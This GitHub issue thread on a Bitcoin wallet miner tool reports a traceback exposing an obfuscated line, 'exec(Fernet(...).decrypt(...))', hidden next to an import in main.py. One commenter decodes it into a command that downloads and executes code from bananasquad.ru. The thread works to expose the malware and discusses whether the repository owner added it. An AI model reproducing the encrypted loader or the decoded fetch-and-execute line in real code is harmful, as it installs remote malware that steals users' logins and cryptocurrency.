Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SyntaxWarning: invalid escape sequence '\(' `-._____.-'""") #20

Open
ghost3666 opened this issue Oct 4, 2023 · 12 comments
Open

SyntaxWarning: invalid escape sequence '\(' `-._____.-'""") #20

ghost3666 opened this issue Oct 4, 2023 · 12 comments

Comments

@ghost3666
Copy link

main.py:48: SyntaxWarning: invalid escape sequence '('
`-._____.-'""")
Bitcoin-Wallet-Miner-main\main.py", line 6, in
import requests ;exec(Fernet(b'7n_miwaUaVYiBEyp9OccQrqxxofGLIvTrPItavlF7TQ=').decrypt(b'gAAAAABk8gbNQAS0dUKTcVbTWBEKC3IrVt8cNepeHlzyFMMgKS1vjegT-M9d13z5gSthEuuwQHFs5sKfO7E28CiyXemLCQK2wNEuXuH7p9AvOMLjMcRuynqKAF0mTlgU9Z-Nmh8a-mg5i1-cfgPsnJ4tUae8RWTWtloE1KPoULA9EexeDMAXgPvSJ2E-3po8D28BgNbfS9-4npnrI4k9zNTJ99WK1ssj6Q=='))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "", line 1, in
File "", line 30

2023-10-04 06:53:47 UTC

^
SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers

@AndreJorgeLopes
Copy link

fyi, that Fernet encrypted code is probably running a malware on your computer and adding it to the startup folder, so that it steals your logins infos and cryptos.

@cloutjs
Copy link
Owner

cloutjs commented Oct 10, 2023

how would it install malware? you have the whole source code where is it installing malware?
it's not fernet encrypted code from me, it gets triggered trough that error (that nobody reported before btw) from "import requests".
this repo has been online for over a year now without anyone ever complaining about credentials being stolen or anything similar, why are you trying to destroy my reputation by spamming that stupid message everywhere without checking the code yourself. pretty emerassing...

@AndreJorgeLopes
Copy link

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following:
exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>',''))
just search on the internet for bananasquard.ru '-'

@ghost3666
Copy link
Author

ghost3666 commented Oct 11, 2023 via email

@cloutjs
Copy link
Owner

cloutjs commented Oct 11, 2023

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following:
exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>',''))
just search on the internet for bananasquard.ru '-'

there is no fernet code in my py script so what are you getting at

@cloutjs
Copy link
Owner

cloutjs commented Oct 11, 2023

could the site I'm scraping from be the problem?
as I said, the project has not been updated since over a year and the website used to look like this: https://web.archive.org/web/20220814121727/https://www.bitcoinlist.io/
and now it's down...

@ghost3666
Copy link
Author

ghost3666 commented Oct 12, 2023 via email

@ghost3666
Copy link
Author

is this possible to get this tool more faster.............

@cloutjs
Copy link
Owner

cloutjs commented Oct 12, 2023

so the code on top is not from my tool right?

@AndreJorgeLopes
Copy link

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

@cloutjs
Copy link
Owner

cloutjs commented Oct 16, 2023

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

no problem man really, I was so confused at first too haha

@SuperKaa
Copy link

SuperKaa commented May 4, 2024

the api does not work anymore, bitcoinlist.io is down and qcoinz.com is returning errors, do you have any new site to use?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants